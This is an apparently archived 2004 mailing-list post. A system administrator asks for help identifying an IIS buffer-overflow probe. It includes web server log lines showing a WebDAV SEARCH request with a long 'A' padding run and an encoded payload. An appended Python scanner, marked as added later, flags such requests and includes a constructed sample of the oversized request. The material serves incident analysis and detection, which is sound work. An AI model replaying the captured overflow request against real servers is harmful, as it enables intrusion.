Message-ID: <200404290634.AA205390158@transientimages.com>
From: root at transientimages.com (System Administrator)
Subject: Exploit Identification Request

Folks : 

One of our external systems (W2k, fully patched all components - 
sp4, sql sp4, mdac sp3, post hotfixes, etc) is being hit by what 
appears to be a buffer overflow of IIS : 4096 bytes cycling in 
what appears to be an attempt to execute code. The probe starts by 
obtaining an index.asp page, and then drops a "SEARCH / 411 210 
42" before dropping the "AAAAA<n>" string. 

I've checked the SEARCH unicode against google (nothing) and k-otic's 
current exploits (nada) and dshield tables (nada).

Can anyone assist in identification of the exploit/overrun attempt?

Thanks,
Oliver

2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189 
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - -
2004-04-28 21:12:45 x.x.88.247 
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfd
2004-04-28 21:12:51 217.185.88.247 
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
2004-04-28 21:13:01 217.185.198.113 GET /index.asp 200 0 189 
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:13:04 217.185.198.113 SEARCH / 411 210 42 - -
2004-04-28 21:13:27 217.185.198.113 
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
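A defender's check for the request pattern in the log excerpt above, added here as an example and not part of the original post: a small scanner over IIS W3C log lines that flags WebDAV methods such as SEARCH, oversized request URIs, long runs of one repeated byte, and the specific sequence shown in the post (a bare `SEARCH /` answered with 411 Length Required, followed from the same address by a SEARCH with a multi-kilobyte path). The field order is taken from the excerpt; the thresholds and the sample log lines are constructed for this example, and the status code on the long request is made up since the post does not show it.

```python
"""Flag IIS W3C log lines that match the WebDAV SEARCH probe pattern."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Thresholds are assumptions chosen for this example, not IIS settings.
MAX_URI_LEN = 1024      # request paths longer than this are rare on a normal site
MIN_BYTE_RUN = 64       # a run of one repeated byte this long is a red flag
WEBDAV_METHODS = {"SEARCH", "PROPFIND", "PROPPATCH", "MKCOL",
                  "LOCK", "UNLOCK", "COPY", "MOVE"}

# Field order taken from the excerpt in the post:
# date time c-ip cs-method cs-uri sc-status sc-win32-status sc-bytes ...
LOG_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) (?P<ip>\S+) "
    r"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<status>\d{3}) (?P<win32>\d+) (?P<bytes>\d+)"
)
RUN_RE = re.compile(r"(.)\1{%d,}" % (MIN_BYTE_RUN - 1))


@dataclass
class Alert:
    ip: str
    time: str
    rule: str
    detail: str


def parse_line(line):
    """Return the field dict for one log line, or None for blank, comment or unparsable lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """Run the rules over an iterable of log lines and return the alerts in order."""
    alerts = []
    seen_411_search = defaultdict(bool)   # ip -> saw 'SEARCH /' answered with 411
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, t, method, uri, status = (rec["ip"], rec["time"], rec["method"],
                                      rec["uri"], rec["status"])
        if method in WEBDAV_METHODS:
            alerts.append(Alert(ip, t, "webdav-method", f"{method} {uri[:40]} -> {status}"))
        oversized = len(uri) > MAX_URI_LEN
        if oversized:
            alerts.append(Alert(ip, t, "oversized-uri", f"{len(uri)} byte URI"))
        run = RUN_RE.search(uri)
        if run:
            alerts.append(Alert(ip, t, "repeated-byte-run",
                                f"{len(run.group(0))} x {run.group(1)!r}"))
        # The post's sequence: 'SEARCH /' gets 411, then an oversized SEARCH follows.
        if method == "SEARCH" and status == "411" and uri == "/":
            seen_411_search[ip] = True
        elif method == "SEARCH" and oversized and seen_411_search[ip]:
            alerts.append(Alert(ip, t, "probe-sequence",
                                "411 SEARCH probe followed by oversized SEARCH"))
    return alerts


def rules_by_ip(alerts):
    """Group the rule names that fired by source address."""
    out = defaultdict(set)
    for a in alerts:
        out[a.ip].add(a.rule)
    return dict(out)


# Constructed sample modelled on the excerpt; the long path in the post was ~4096 bytes.
LONG_URI = "/" + "A" * 4000 + "%3F" * 8
SAMPLE_LOG = [
    "2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -",
    "2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - -",
    f"2004-04-28 21:12:45 x.x.88.247 SEARCH {LONG_URI} 500 0 0 - -",   # status is made up
    "2004-04-28 21:13:10 10.0.0.5 PROPFIND /docs/ 207 0 512 - -",
    "2004-04-28 21:13:11 10.0.0.6 GET /index.asp 200 0 189 Mozilla/4.0 -",
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.time} {a.ip:14} {a.rule:18} {a.detail}")
```

On a server that does not serve WebDAV, the `webdav-method` rule alone is enough to surface this traffic; the `probe-sequence` rule ties the harmless-looking `SEARCH / 411` line to the oversized request that follows it, which is what makes the excerpt above recognisable as one probe rather than two unrelated requests.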